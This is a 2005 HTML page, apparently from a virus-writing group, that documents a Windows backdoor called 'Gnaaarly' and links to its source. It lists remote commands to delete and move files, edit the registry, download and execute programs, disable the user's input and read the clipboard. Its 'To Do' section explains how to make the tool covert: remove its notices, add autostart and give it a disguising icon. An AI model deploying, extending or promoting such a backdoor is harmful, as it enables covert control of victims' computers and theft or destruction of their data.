<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
<meta name="author" content="DiA">
<meta name="generator" content="Ulli Meybohms HTML EDITOR">

<link rel="stylesheet" href="../css/style_all.css">
</head>

<body>
<pre>

Bockdoor.Gnaaarly by DiA/rrlf (c) 2005
DiA_hates_machine@gmx.de - www.vx-dia.de.vu
###########################################

Disclaimer:
 I am not respnsible for any damage you make with this tool. Just use it to learn
 how winsock and all the other stuff work. Or to annoy your brother or classmate a
 little bit, but no destruction! Take care.


Features:
 -listen to port 30687 for connections
 -accept connections from computers in the network
 -awaiting commands
 -execute commands
 -reply if it had success
 -if it fails it reply a formated system error in your language
 -close client, and server is still running
 -after server is closed no commands anymore ;)


Commands:
 Fun:
  !msgbox 'Caption' 'Message'		- shows a message box
  !mouse 'disable/enable'		- disables or enables mouse
  !input 'disable/enable'		- disables or enables keyboard and mouse
  !cdrom 'open/close'			- open or close cd-rom
  !start 'hide/show'			- hide or show windows start button
  !monitor 'on/off'			- turns monitor on or off
 Examples:
  !msgbox 'Gnaaarly Backdoor' 'A gnaaarly backdoor is running...'
  !mouse 'disable'
  !mouse 'enable'
  !input 'disable'
  !input 'enable'
  !cdrom 'open'
  !cdrom 'close'
  !start 'hide'
  !start 'show'
  !monitor 'off'
  !monitor 'on'

 Paths:
  !windowspath				- returns windows directory
  !systempath				- returns system directory
  !location				- returns the location of the running server
  !getdirectory				- returns the current directory
  !setdirectory 'Path'			- set a new current directory
 Examples:
  !setdirectory 'C:\Windows'

 Lists:
  !dirlist 'Path'			- list all directorys in path
  !filelist 'Path'			- list all directorys in path
 Examples:
  !dirlist 'D:\'
  !filelist 'C:'

 Files:
  !copyfile 'Existing' 'New'		- copy a file, do not copy if already exist
  !movefile 'Existing' 'New'		- move a file, do not move if already exist
  !deletefile 'Existing'		- deletes an existing file
 Examples:
  !copyfile 'C:\Windows\Notepad.exe' 'C:\Editor.exe'
  !movefile 'C:\Editor.exe' 'C:\edit.exe'
  !deletefile 'C:\edit.exe'

 Registry:
  !regwrite 'HKEY' 'Subkey' 'Name' 'Value' - write a string to the registry
  !regread 'HKEY' 'Subkey' 'ValueName'	   - returns a string from registry
 Examples:
  !regwrite 'HKEY_CURRENT_USER' 'Console' 'FaceName' 'Gnaaarly'
  !regread 'HKEY_LOCAL_MACHINE' 'SOFTWARE\Microsoft\Windows\CurrentVersion' 'ProductId'

 Applications:
  !execute 'Path'			- executes a application
 Examples:
  !execute 'C:\Windows\Notepad.exe'

 Internet:
  !download 'URL' 'Path'		- download a file from inet to local
 Examples:
  !download 'http://home.arcor.de/vx-dia/index.htm' 'C:\firstpage.htm'

 Exit Windows:
  !shutdown				- shutdown windows
  !reboot				- reboot windows

 Clipboard:
  !getclipboard				- returns the text in the clipboard if exist
  !setclipboard 'Text'			- copy a new text into clipboard
 Examples:
  !setclipboard 'visit www.vx-dia.de.vu !!!'

 Connection:
  !close


Clients:
 I made 2 clients, a console based in C++ and a GUI in VB. Fell free to use both.


To Do for you:
 This tool is not made to be evil. So if you want it evil you should:
 -remove that start message
 -remove error message
 -do autostart
 -make a nice icon
 -add more commands ;)


Source:
 Please feel free to edit this tool, show it to friends and distribute it.
 For thanks or fucks drop me a mail to DiA_hates_machine@gmx.de
 <a href="Gnaaarly/"><i><b>Source Code</b></i></a>

 
Copyleft:
 DiA(c)2005 Ready Ranger Liberation Front
  pS: Big greets fly's out to my little beta tester, SPTH, thanx, have fun...

</pre>
</body>
</html>